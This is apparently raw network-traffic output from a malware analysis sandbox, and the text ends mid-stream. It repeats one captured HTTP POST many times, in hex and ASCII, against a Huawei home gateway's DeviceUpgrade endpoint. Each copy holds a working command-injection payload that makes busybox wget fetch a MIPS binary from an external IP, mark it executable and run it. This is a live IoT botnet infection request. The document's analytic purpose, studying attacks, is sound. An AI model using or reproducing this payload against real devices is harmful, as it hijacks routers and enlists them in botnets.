    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 